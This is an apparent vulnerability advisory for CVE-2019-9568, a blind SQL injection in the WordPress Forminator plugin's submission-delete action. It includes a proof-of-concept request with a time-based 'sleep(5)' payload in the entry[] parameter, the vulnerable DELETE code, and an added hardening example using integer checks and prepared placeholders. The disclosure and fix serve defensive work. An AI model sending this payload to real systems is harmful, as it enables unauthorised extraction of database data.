WordPress Forminator Plugin CVE-2019-9568

2019-03-05T13:50:29
ID CVE0DAY:D7CBE927705AD2466F6779C330D5C5D7
Type cve0day
Reporter CVE 0day
Modified 2019-03-05T13:50:29

Description

The action of deleting submissions is vulnerable to blind SQL injection. An attacker can exploit this to extract data from the database.

An account with the permission to delete submissions is required.

Proof of Concept
Request
GET /wordpress/wp-admin/admin.php?page=forminator-entries&form_type=forminator_forms&form_id=133&forminatorEntryNonce=1c8732f95e&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dforminator-entries%26form_type%3Dforminator_forms%26form_id%3D133&entries-action=&date_range=&min_id=&max_id=&search=&order_by=entries.date_created&order=DESC&entry%5B%5D=1)+or+sleep(5)--+-&entry%5B%5D=1&entries-action-bottom=delete-all HTTP/1.1
Host: 192.168.0.103

A valid nonce is required.

Code
forminator/library/model/class-form-entry-model.php
$sql = "DELETE FROM {$table_meta_name} WHERE `entry_id` IN ($entries)";
$db->query( $sql );

$sql = "DELETE FROM {$table_name} WHERE `entry_id` IN ($entries)";
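
Added example, not Forminator's own code: one way to harden the two DELETE statements above so that the `entry[]` values from the request cannot change the query. It assumes `$entries` is built by joining the request's `entry[]` values with commas; the helper names and the table name are hypothetical placeholders.

```php
<?php
// Added example, not the plugin's code. Assumption: $entries comes from
// joining the request's entry[] values with commas.

// Keep only values that are plain positive decimal integers (hypothetical helper).
function example_clean_entry_ids( array $raw ): array {
    $ids = array();
    foreach ( $raw as $value ) {
        // ctype_digit() accepts only non-empty strings of 0-9, so the value
        // "1) or sleep(5)-- -" is rejected rather than truncated to 1.
        if ( is_string( $value ) && ctype_digit( $value ) && (int) $value > 0 ) {
            $ids[] = (int) $value;
        }
    }
    return array_values( array_unique( $ids ) );
}

// Build the statement with one %d placeholder per id (hypothetical helper).
// Returns null when no valid id remains, so the caller runs no query at all.
function example_build_delete( string $table, array $ids ): ?array {
    if ( empty( $ids ) ) {
        return null;
    }
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql          = "DELETE FROM {$table} WHERE `entry_id` IN ($placeholders)";
    return array( $sql, $ids );
}

// Constructed input: the two entry[] values from the request above, URL-decoded.
$raw   = array( '1) or sleep(5)-- -', '1' );
$ids   = example_clean_entry_ids( $raw );
$built = example_build_delete( 'wp_example_entry_meta', $ids ); // placeholder table name

if ( null !== $built ) {
    list( $sql, $args ) = $built;
    // Inside WordPress the statement would then be bound and executed with:
    //   $db->query( $db->prepare( $sql, $args ) );
    echo $sql, "\n", implode( ',', $args ), "\n";
}
```

Rejecting a malformed value outright, rather than casting it with `intval()`, also keeps a tampered request from silently deleting the entry whose id happens to prefix the string.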
